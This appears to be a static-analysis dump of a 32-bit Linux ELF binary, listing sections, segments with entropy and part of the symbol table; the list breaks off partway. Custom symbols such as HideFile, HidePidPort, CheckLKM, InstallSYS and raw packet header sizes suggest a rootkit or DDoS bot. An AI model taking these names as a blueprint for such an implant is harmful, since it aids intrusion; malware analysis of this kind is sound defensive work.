Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	0	0	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x8048110	0x110	0x697d8	0x0	0x6	AX	0	0	16
__libc_freeres_fn	PROGBITS	0x80b18f0	0x698f0	0x100f	0x0	0x6	AX	0	0	16
__libc_thread_freeres_fn	PROGBITS	0x80b2900	0x6a900	0x1db	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x80b2adc	0x6aadc	0x1c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x80b2b00	0x6ab00	0x153c0	0x0	0x2	A	0	0	32
__libc_subfreeres	PROGBITS	0x80c7ec0	0x7fec0	0x30	0x0	0x2	A	0	0	4
__libc_atexit	PROGBITS	0x80c7ef0	0x7fef0	0x4	0x0	0x2	A	0	0	4
__libc_thread_subfreeres	PROGBITS	0x80c7ef4	0x7fef4	0x8	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x80c7efc	0x7fefc	0x60f4	0x0	0x2	A	0	0	4
.gcc_except_table	PROGBITS	0x80cdff0	0x85ff0	0x11b	0x0	0x2	A	0	0	1
.tdata	PROGBITS	0x80cf10c	0x8610c	0x14	0x0	0x403	WAT	0	0	4
.tbss	NOBITS	0x80cf120	0x86120	0x2c	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x80cf120	0x86120	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x80cf128	0x86128	0xc	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x80cf134	0x86134	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x80cf138	0x86138	0x2c	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x80cf164	0x86164	0x8	0x4	0x3	WA	0	0	4
.got.plt	PROGBITS	0x80cf16c	0x8616c	0xc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x80cf180	0x86180	0xb40	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x80cfcc0	0x86cc0	0x6718	0x0	0x3	WA	0	0	32
__libc_freeres_ptrs	NOBITS	0x80d63d8	0x86cc0	0x14	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x86cc0	0x422	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x870e2	0x126	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x87668	0x93c0	0x10	0x0		27	914	4
.strtab	STRTAB	0x0	0x90a28	0x82a3	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x8610b	0x8610b	6.1965	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x8610c	0x80cf10c	0x80cf10c	0xbb4	0x72e0	3.6572	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x8610c	0x80cf10c	0x80cf10c	0x14	0x40	2.8414	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x80480d4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x80480f4	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x8048110	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x80b18f0	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x80b2900	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x80b2adc	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x80b2b00	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x80c7ec0	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x80c7ef0	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x80c7ef4	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x80c7efc	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x80cdff0	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x80cf10c	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x80cf128	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x80cf134	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x80cf138	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x80cf164	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x80cf16c	0	SECTION	<unknown>	DEFAULT	20
	.symtab	0x80cf180	0	SECTION	<unknown>	DEFAULT	21
	.symtab	0x80cfcc0	0	SECTION	<unknown>	DEFAULT	22
	.symtab	0x80d63d8	0	SECTION	<unknown>	DEFAULT	23
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
.L108	.symtab	0x80ad950	0	NOTYPE	<unknown>	DEFAULT	3
.L113	.symtab	0x80ad990	0	NOTYPE	<unknown>	DEFAULT	3
.L114	.symtab	0x80ad9f8	0	NOTYPE	<unknown>	DEFAULT	3
.L115	.symtab	0x80ada30	0	NOTYPE	<unknown>	DEFAULT	3
.L116	.symtab	0x80ada4e	0	NOTYPE	<unknown>	DEFAULT	3
.L117	.symtab	0x80ada6c	0	NOTYPE	<unknown>	DEFAULT	3
.L118	.symtab	0x80ada89	0	NOTYPE	<unknown>	DEFAULT	3
.L119	.symtab	0x80adabd	0	NOTYPE	<unknown>	DEFAULT	3
.L12	.symtab	0x80b130b	0	NOTYPE	<unknown>	DEFAULT	3
.L120	.symtab	0x80adadc	0	NOTYPE	<unknown>	DEFAULT	3
.L121	.symtab	0x80adafb	0	NOTYPE	<unknown>	DEFAULT	3
.L122	.symtab	0x80ad8e3	0	NOTYPE	<unknown>	DEFAULT	3
.L123	.symtab	0x80adb2b	0	NOTYPE	<unknown>	DEFAULT	3
.L124	.symtab	0x80add7f	0	NOTYPE	<unknown>	DEFAULT	3
.L125	.symtab	0x80addb4	0	NOTYPE	<unknown>	DEFAULT	3
.L126	.symtab	0x80add02	0	NOTYPE	<unknown>	DEFAULT	3
.L127	.symtab	0x80add1f	0	NOTYPE	<unknown>	DEFAULT	3
.L128	.symtab	0x80add46	0	NOTYPE	<unknown>	DEFAULT	3
.L129	.symtab	0x80add63	0	NOTYPE	<unknown>	DEFAULT	3
.L130	.symtab	0x80adb8c	0	NOTYPE	<unknown>	DEFAULT	3
.L131	.symtab	0x80adbd3	0	NOTYPE	<unknown>	DEFAULT	3
.L132	.symtab	0x80adc00	0	NOTYPE	<unknown>	DEFAULT	3
.L133	.symtab	0x80adc37	0	NOTYPE	<unknown>	DEFAULT	3
.L134	.symtab	0x80adc50	0	NOTYPE	<unknown>	DEFAULT	3
.L135	.symtab	0x80adc7d	0	NOTYPE	<unknown>	DEFAULT	3
.L136	.symtab	0x80adcb5	0	NOTYPE	<unknown>	DEFAULT	3
.L137	.symtab	0x80adcc9	0	NOTYPE	<unknown>	DEFAULT	3
.L14	.symtab	0x80b1419	0	NOTYPE	<unknown>	DEFAULT	3
.L15	.symtab	0x80b1408	0	NOTYPE	<unknown>	DEFAULT	3
.L16	.symtab	0x80b13f8	0	NOTYPE	<unknown>	DEFAULT	3
.L17	.symtab	0x80b13e8	0	NOTYPE	<unknown>	DEFAULT	3
.L18	.symtab	0x80b138c	0	NOTYPE	<unknown>	DEFAULT	3
.L19	.symtab	0x80b137e	0	NOTYPE	<unknown>	DEFAULT	3
.L20	.symtab	0x80b1345	0	NOTYPE	<unknown>	DEFAULT	3
.L21	.symtab	0x80b1371	0	NOTYPE	<unknown>	DEFAULT	3
.L258	.symtab	0x80ae76c	0	NOTYPE	<unknown>	DEFAULT	3
.L259	.symtab	0x80ae4a0	0	NOTYPE	<unknown>	DEFAULT	3
.L260	.symtab	0x80ae5f7	0	NOTYPE	<unknown>	DEFAULT	3
.L261	.symtab	0x80ae7c0	0	NOTYPE	<unknown>	DEFAULT	3
.L262	.symtab	0x80ae5e9	0	NOTYPE	<unknown>	DEFAULT	3
.L264	.symtab	0x80ae43d	0	NOTYPE	<unknown>	DEFAULT	3
.L266	.symtab	0x80ae496	0	NOTYPE	<unknown>	DEFAULT	3
.L267	.symtab	0x80ae68f	0	NOTYPE	<unknown>	DEFAULT	3
.L268	.symtab	0x80ae6a0	0	NOTYPE	<unknown>	DEFAULT	3
.L269	.symtab	0x80ae605	0	NOTYPE	<unknown>	DEFAULT	3
.L270	.symtab	0x80ae628	0	NOTYPE	<unknown>	DEFAULT	3
.L271	.symtab	0x80ae642	0	NOTYPE	<unknown>	DEFAULT	3
.L272	.symtab	0x80ae664	0	NOTYPE	<unknown>	DEFAULT	3
.L273	.symtab	0x80ae4ab	0	NOTYPE	<unknown>	DEFAULT	3
.L274	.symtab	0x80ae4e4	0	NOTYPE	<unknown>	DEFAULT	3
.L275	.symtab	0x80ae599	0	NOTYPE	<unknown>	DEFAULT	3
.L276	.symtab	0x80ae55f	0	NOTYPE	<unknown>	DEFAULT	3
.L277	.symtab	0x80ae5da	0	NOTYPE	<unknown>	DEFAULT	3
.L278	.symtab	0x80ae835	0	NOTYPE	<unknown>	DEFAULT	3
.L279	.symtab	0x80ae7ce	0	NOTYPE	<unknown>	DEFAULT	3
.L280	.symtab	0x80ae7e0	0	NOTYPE	<unknown>	DEFAULT	3
.L281	.symtab	0x80ae6b7	0	NOTYPE	<unknown>	DEFAULT	3
.L282	.symtab	0x80ae70c	0	NOTYPE	<unknown>	DEFAULT	3
.L283	.symtab	0x80ae467	0	NOTYPE	<unknown>	DEFAULT	3
.L350	.symtab	0x80ae840	0	NOTYPE	<unknown>	DEFAULT	3
.L351	.symtab	0x80ae84a	0	NOTYPE	<unknown>	DEFAULT	3
.L352	.symtab	0x80ae859	0	NOTYPE	<unknown>	DEFAULT	3
.L353	.symtab	0x80ae863	0	NOTYPE	<unknown>	DEFAULT	3
.L354	.symtab	0x80ae872	0	NOTYPE	<unknown>	DEFAULT	3
.L355	.symtab	0x80ae87d	0	NOTYPE	<unknown>	DEFAULT	3
.L356	.symtab	0x80ae887	0	NOTYPE	<unknown>	DEFAULT	3
.L357	.symtab	0x80ae892	0	NOTYPE	<unknown>	DEFAULT	3
.L358	.symtab	0x80ae89e	0	NOTYPE	<unknown>	DEFAULT	3
.L359	.symtab	0x80ae8aa	0	NOTYPE	<unknown>	DEFAULT	3
.L360	.symtab	0x80ae8b3	0	NOTYPE	<unknown>	DEFAULT	3
.L361	.symtab	0x80ae8bd	0	NOTYPE	<unknown>	DEFAULT	3
.L362	.symtab	0x80ae8cc	0	NOTYPE	<unknown>	DEFAULT	3
.L363	.symtab	0x80ae8db	0	NOTYPE	<unknown>	DEFAULT	3
.L364	.symtab	0x80ae8ea	0	NOTYPE	<unknown>	DEFAULT	3
.L365	.symtab	0x80ae8f9	0	NOTYPE	<unknown>	DEFAULT	3
.L366	.symtab	0x80ae908	0	NOTYPE	<unknown>	DEFAULT	3
.L380	.symtab	0x80ae438	0	NOTYPE	<unknown>	DEFAULT	3
.L411	.symtab	0x80aeb10	0	NOTYPE	<unknown>	DEFAULT	3
.L412	.symtab	0x80aeae6	0	NOTYPE	<unknown>	DEFAULT	3
.L413	.symtab	0x80aeb54	0	NOTYPE	<unknown>	DEFAULT	3
.L414	.symtab	0x80aebc0	0	NOTYPE	<unknown>	DEFAULT	3
.L415	.symtab	0x80aec20	0	NOTYPE	<unknown>	DEFAULT	3
.L416	.symtab	0x80aec60	0	NOTYPE	<unknown>	DEFAULT	3
.L61	.symtab	0x80ad673	0	NOTYPE	<unknown>	DEFAULT	3
.L63	.symtab	0x80ad6ef	0	NOTYPE	<unknown>	DEFAULT	3
.L64	.symtab	0x80ad6ce	0	NOTYPE	<unknown>	DEFAULT	3
.L67	.symtab	0x80ad6de	0	NOTYPE	<unknown>	DEFAULT	3
.L68	.symtab	0x80ad6d6	0	NOTYPE	<unknown>	DEFAULT	3
.L69	.symtab	0x80ad6a2	0	NOTYPE	<unknown>	DEFAULT	3
.L70	.symtab	0x80ad6c2	0	NOTYPE	<unknown>	DEFAULT	3
.L74	.symtab	0x80afb63	0	NOTYPE	<unknown>	DEFAULT	3
.L76	.symtab	0x80afbdf	0	NOTYPE	<unknown>	DEFAULT	3
.L77	.symtab	0x80afbbe	0	NOTYPE	<unknown>	DEFAULT	3
.L80	.symtab	0x80afbce	0	NOTYPE	<unknown>	DEFAULT	3
.L81	.symtab	0x80afbc6	0	NOTYPE	<unknown>	DEFAULT	3
.L82	.symtab	0x80afb92	0	NOTYPE	<unknown>	DEFAULT	3
.L83	.symtab	0x80afbb2	0	NOTYPE	<unknown>	DEFAULT	3
AddService	.symtab	0x8048865	807	FUNC	<unknown>	DEFAULT	3
CalcCrc32	.symtab	0x80492b4	70	FUNC	<unknown>	DEFAULT	3
CalcFileCrc	.symtab	0x8049346	172	FUNC	<unknown>	DEFAULT	3
CalcFindIpCrc	.symtab	0x8049320	38	FUNC	<unknown>	DEFAULT	3
CalcHeaderCrc	.symtab	0x80492fa	38	FUNC	<unknown>	DEFAULT	3
CheckLKM	.symtab	0x804a670	107	FUNC	<unknown>	DEFAULT	3
CreateDir	.symtab	0x80483de	375	FUNC	<unknown>	DEFAULT	3
DNS_ADDR	.symtab	0x80cf4cc	16	OBJECT	<unknown>	DEFAULT	21
DNS_ADDR2	.symtab	0x80cf4dc	16	OBJECT	<unknown>	DEFAULT	21
DNS_PORT	.symtab	0x80cf4ec	4	OBJECT	<unknown>	DEFAULT	21
DelService	.symtab	0x8048cdc	275	FUNC	<unknown>	DEFAULT	3
DelService_form_pid	.symtab	0x8048def	113	FUNC	<unknown>	DEFAULT	3
GetCpuInfo	.symtab	0x804e2ce	539	FUNC	<unknown>	DEFAULT	3
GetIndex	.symtab	0x804b418	189	FUNC	<unknown>	DEFAULT	3
GetLanSpeed	.symtab	0x804e5e1	243	FUNC	<unknown>	DEFAULT	3
GetMemStat	.symtab	0x804e1d9	245	FUNC	<unknown>	DEFAULT	3
Get_AllIP	.symtab	0x804ef5d	375	FUNC	<unknown>	DEFAULT	3
HideFile	.symtab	0x804a74d	151	FUNC	<unknown>	DEFAULT	3
HidePidPort	.symtab	0x804a6db	114	FUNC	<unknown>	DEFAULT	3
InstallSYS	.symtab	0x8048b8c	336	FUNC	<unknown>	DEFAULT	3
LinuxExec	.symtab	0x8048eed	122	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv	.symtab	0x8048f67	135	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv2	.symtab	0x8048fee	148	FUNC	<unknown>	DEFAULT	3
LogFacility	.symtab	0x80cfa0c	4	OBJECT	<unknown>	DEFAULT	21
LogFile	.symtab	0x80cfa08	4	OBJECT	<unknown>	DEFAULT	21
LogMask	.symtab	0x80cfa00	4	OBJECT	<unknown>	DEFAULT	21
LogStat	.symtab	0x80d5044	4	OBJECT	<unknown>	DEFAULT	22
LogTag	.symtab	0x80d5048	4	OBJECT	<unknown>	DEFAULT	22
LogType	.symtab	0x80cfa04	4	OBJECT	<unknown>	DEFAULT	21
MAGIC_STR	.symtab	0x80d1f60	33	OBJECT	<unknown>	DEFAULT	22
MainList	.symtab	0x80d1fa0	264	OBJECT	<unknown>	DEFAULT	22
ReadWord	.symtab	0x804e150	137	FUNC	<unknown>	DEFAULT	3
SIZE_DNS_H	.symtab	0x80cf4a4	4	OBJECT	<unknown>	DEFAULT	21
SIZE_DNS_T	.symtab	0x80cf4a8	4	OBJECT	<unknown>	DEFAULT	21
SIZE_IP_H	.symtab	0x80cf498	4	OBJECT	<unknown>	DEFAULT	21
SIZE_PSEUDO_HDR	.symtab	0x80cf4ac	4	OBJECT	<unknown>	DEFAULT	21
SIZE_TCP_H	.symtab	0x80cf4a0	4	OBJECT	<unknown>	DEFAULT	21
SIZE_UDP_H	.symtab	0x80cf49c	4	OBJECT	<unknown>	DEFAULT	21
SYS_BUF	.symtab	0x80cfce0	1	OBJECT	<unknown>	DEFAULT	22
SyslogAddr	.symtab	0x80d5060	110	OBJECT	<unknown>	DEFAULT	22
THREAD_NUM	.symtab	0x80d6170	4	OBJECT	<unknown>	DEFAULT	22
_Exit	.symtab	0x8067a28	19	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_	.symtab	0x80cf16c	0	OBJECT	<unknown>	HIDDEN	20
_IO_2_1_stderr_	.symtab	0x80cf700	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdin_	.symtab	0x80cf5c0	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdout_	.symtab	0x80cf660	152	OBJECT	<unknown>	DEFAULT	21
_IO_adjust_column	.symtab	0x805c9b0	60	FUNC	<unknown>	DEFAULT	3
_IO_adjust_wcolumn	.symtab	0x8084770	63	FUNC	<unknown>	DEFAULT	3
_IO_cleanup	.symtab	0x805d310	409	FUNC	<unknown>	DEFAULT	3
_IO_default_doallocate	.symtab	0x805de10	143	FUNC	<unknown>	DEFAULT	3
_IO_default_finish	.symtab	0x805e310	525	FUNC	<unknown>	DEFAULT	3
_IO_default_imbue	.symtab	0x805cac0	5	FUNC	<unknown>	DEFAULT	3
_IO_default_pbackfail	.symtab	0x805d900	310	FUNC	<unknown>	DEFAULT	3
_IO_default_read	.symtab	0x805ca90	10	FUNC	<unknown>	DEFAULT	3
_IO_default_seek	.symtab	0x805ca70	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekoff	.symtab	0x805c900	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekpos	.symtab	0x805c810	59	FUNC	<unknown>	DEFAULT	3
_IO_default_setbuf	.symtab	0x805dd10	244	FUNC	<unknown>	DEFAULT	3
_IO_default_showmanyc	.symtab	0x805cab0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_stat	.symtab	0x805ca80	10	FUNC	<unknown>	DEFAULT	3
_IO_default_sync	.symtab	0x805c8f0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_uflow	.symtab	0x805c7b0	52	FUNC	<unknown>	DEFAULT	3
_IO_default_underflow	.symtab	0x805c7a0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_write	.symtab	0x805caa0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_xsgetn	.symtab	0x805e250	185	FUNC	<unknown>	DEFAULT	3
_IO_default_xsputn	.symtab	0x805cc80	225	FUNC	<unknown>	DEFAULT	3
_IO_do_write	.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_doallocbuf	.symtab	0x805dc80	133	FUNC	<unknown>	DEFAULT	3
_IO_fclose	.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_feof	.symtab	0x80596d0	154	FUNC	<unknown>	DEFAULT	3
_IO_fgets	.symtab	0x8057ff0	360	FUNC	<unknown>	DEFAULT	3
_IO_file_attach	.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_file_close	.symtab	0x805a940	18	FUNC	<unknown>	DEFAULT	3
_IO_file_close_it	.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_file_close_mmap	.symtab	0x805a960	60	FUNC	<unknown>	DEFAULT	3
_IO_file_doallocate	.symtab	0x80839b0	275	FUNC	<unknown>	DEFAULT	3
_IO_file_finish	.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_file_fopen	.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_file_init	.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_file_jumps	.symtab	0x80b3e00	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_maybe_mmap	.symtab	0x80b3ec0	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_mmap	.symtab	0x80b3e60	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_open	.symtab	0x805af30	263	FUNC	<unknown>	DEFAULT	3
_IO_file_overflow	.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_file_read	.symtab	0x805a9d0	48	FUNC	<unknown>	DEFAULT	3
_IO_file_seek	.symtab	0x8059fd0	18	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff	.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_maybe_mmap	.symtab	0x8059f80	80	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_mmap	.symtab	0x8059e50	297	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf	.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf_mmap	.symtab	0x805b270	115	FUNC	<unknown>	DEFAULT	3
_IO_file_stat	.symtab	0x805a9a0	37	FUNC	<unknown>	DEFAULT	3
_IO_file_sync	.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_file_sync_mmap	.symtab	0x8059ff0	165	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow	.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_maybe_mmap	.symtab	0x805a2e0	30	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_mmap	.symtab	0x805a6b0	66	FUNC	<unknown>	DEFAULT	3
_IO_file_write	.symtab	0x805a890	166	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn	.symtab	0x805a700	394	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_maybe_mmap	.symtab	0x805a290	67	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_mmap	.symtab	0x805a5b0	242	FUNC	<unknown>	DEFAULT	3
_IO_file_xsputn	.symtab	0x805bab0	705	FUNC	<unknown>	DEFAULT	3
_IO_flush_all	.symtab	0x805d4b0	20	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_linebuffered	.symtab	0x805cf30	448	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_lockp	.symtab	0x805d0f0	533	FUNC	<unknown>	DEFAULT	3
_IO_fopen	.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
_IO_fprintf	.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
_IO_free_backup_area	.symtab	0x805cc20	93	FUNC	<unknown>	DEFAULT	3
_IO_free_wbackup_area	.symtab	0x80847f0	104	FUNC	<unknown>	DEFAULT	3
_IO_ftell	.symtab	0x8083ad0	436	FUNC	<unknown>	DEFAULT	3
_IO_funlockfile	.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
_IO_fwide	.symtab	0x8085950	323	FUNC	<unknown>	DEFAULT	3
_IO_fwrite	.symtab	0x8083d60	297	FUNC	<unknown>	DEFAULT	3
_IO_getc	.symtab	0x8059880	207	FUNC	<unknown>	DEFAULT	3
_IO_getdelim	.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
_IO_getline	.symtab	0x8058440	55	FUNC	<unknown>	DEFAULT	3
_IO_getline_info	.symtab	0x80582d0	353	FUNC	<unknown>	DEFAULT	3
_IO_helper_jumps	.symtab	0x80c2a40	84	OBJECT	<unknown>	DEFAULT	7
_IO_helper_overflow	.symtab	0x8079fc0	175	FUNC	<unknown>	DEFAULT	3
_IO_init	.symtab	0x805db50	163	FUNC	<unknown>	DEFAULT	3
_IO_init_marker	.symtab	0x805dea0	169	FUNC	<unknown>	DEFAULT	3
_IO_init_wmarker	.symtab	0x80850e0	193	FUNC	<unknown>	DEFAULT	3
_IO_iter_begin	.symtab	0x805cad0	10	FUNC	<unknown>	DEFAULT	3
_IO_iter_end	.symtab	0x805cae0	7	FUNC	<unknown>	DEFAULT	3
_IO_iter_file	.symtab	0x805cb00	8	FUNC	<unknown>	DEFAULT	3
_IO_iter_next	.symtab	0x805caf0	11	FUNC	<unknown>	DEFAULT	3
_IO_least_marker	.symtab	0x805c690	38	FUNC	<unknown>	DEFAULT	3
_IO_least_wmarker	.symtab	0x8084570	51	FUNC	<unknown>	DEFAULT	3
_IO_link_in	.symtab	0x805d4d0	400	FUNC	<unknown>	DEFAULT	3
_IO_list_all	.symtab	0x80cf798	4	OBJECT	<unknown>	DEFAULT	21
_IO_list_all_stamp	.symtab	0x80d4b00	4	OBJECT	<unknown>	DEFAULT	22
_IO_list_lock	.symtab	0x805cb10	64	FUNC	<unknown>	DEFAULT	3
_IO_list_resetlock	.symtab	0x805cb90	35	FUNC	<unknown>	DEFAULT	3
_IO_list_unlock	.symtab	0x805cb50	56	FUNC	<unknown>	DEFAULT	3
_IO_marker_delta	.symtab	0x805ca40	47	FUNC	<unknown>	DEFAULT	3
_IO_marker_difference	.symtab	0x805ca20	17	FUNC	<unknown>	DEFAULT	3
_IO_mem_finish	.symtab	0x8085bb0	106	FUNC	<unknown>	DEFAULT	3
_IO_mem_jumps	.symtab	0x80c2ea0	84	OBJECT	<unknown>	DEFAULT	7
_IO_mem_sync	.symtab	0x8085b60	76	FUNC	<unknown>	DEFAULT	3
_IO_new_do_write	.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_new_fclose	.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_new_file_attach	.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_new_file_close_it	.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_new_file_finish	.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_new_file_fopen	.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_new_file_init	.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_new_file_overflow	.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_new_file_seekoff	.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_new_file_setbuf	.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_new_file_sync	.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_new_file_underflow	.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_new_file_write	.symtab	0x805a890	166	FUNC	<unknown>	DEFAULT	3
_IO_new_file_xsputn	.symtab	0x805bab0	705	FUNC	<unknown>	DEFAULT	3
_IO_new_fopen	.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
_IO_no_init	.symtab	0x805da40	259	FUNC	<unknown>	DEFAULT	3
_IO_old_init	.symtab	0x805c850	150	FUNC	<unknown>	DEFAULT	3
_IO_padn	.symtab	0x8084150	203	FUNC	<unknown>	DEFAULT	3
_IO_remove_marker	.symtab	0x805c9f0	40	FUNC	<unknown>	DEFAULT	3
_IO_seekmark	.symtab	0x805d840	179	FUNC	<unknown>	DEFAULT	3
_IO_seekoff	.symtab	0x8084300	233	FUNC	<unknown>	DEFAULT	3
_IO_seekoff_unlocked	.symtab	0x8084220	224	FUNC	<unknown>	DEFAULT	3
_IO_seekwmark	.symtab	0x8084d40	181	FUNC	<unknown>	DEFAULT	3
_IO_setb	.symtab	0x805cbc0	93	FUNC	<unknown>	DEFAULT	3
_IO_sgetn	.symtab	0x805c7f0	18	FUNC	<unknown>	DEFAULT	3
_IO_sputbackc	.symtab	0x805c910	75	FUNC	<unknown>	DEFAULT	3
_IO_sputbackwc	.symtab	0x80846d0	73	FUNC	<unknown>	DEFAULT	3
_IO_sscanf	.symtab	0x8083390	36	FUNC	<unknown>	DEFAULT	3
_IO_stderr	.symtab	0x80cf9e4	4	OBJECT	<unknown>	HIDDEN	21
_IO_stdfile_0_lock	.symtab	0x80d4b10	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdfile_1_lock	.symtab	0x80d4b1c	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdfile_2_lock	.symtab	0x80d4b28	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdin	.symtab	0x80cf9dc	4	OBJECT	<unknown>	HIDDEN	21
_IO_stdin_used	.symtab	0x80b2b04	4	OBJECT	<unknown>	DEFAULT	7
_IO_stdout	.symtab	0x80cf9e0	4	OBJECT	<unknown>	HIDDEN	21
_IO_str_count	.symtab	0x805e6d0	23	FUNC	<unknown>	DEFAULT	3
_IO_str_finish	.symtab	0x805e6f0	60	FUNC	<unknown>	DEFAULT	3
_IO_str_init_readonly	.symtab	0x805ecc0	132	FUNC	<unknown>	DEFAULT	3
_IO_str_init_static	.symtab	0x805ed50	155	FUNC	<unknown>	DEFAULT	3
_IO_str_init_static_internal	.symtab	0x805ea20	145	FUNC	<unknown>	DEFAULT	3
_IO_str_jumps	.symtab	0x80b3f20	84	OBJECT	<unknown>	DEFAULT	7
_IO_str_overflow	.symtab	0x805e8b0	359	FUNC	<unknown>	DEFAULT	3
_IO_str_pbackfail	.symtab	0x805e730	44	FUNC	<unknown>	DEFAULT	3
_IO_str_seekoff	.symtab	0x805eac0	510	FUNC	<unknown>	DEFAULT	3
_IO_str_underflow	.symtab	0x805e680	66	FUNC	<unknown>	DEFAULT	3
_IO_strn_jumps	.symtab	0x80b3d20	84	OBJECT	<unknown>	DEFAULT	7
_IO_strn_overflow	.symtab	0x8059970	99	FUNC	<unknown>	DEFAULT	3
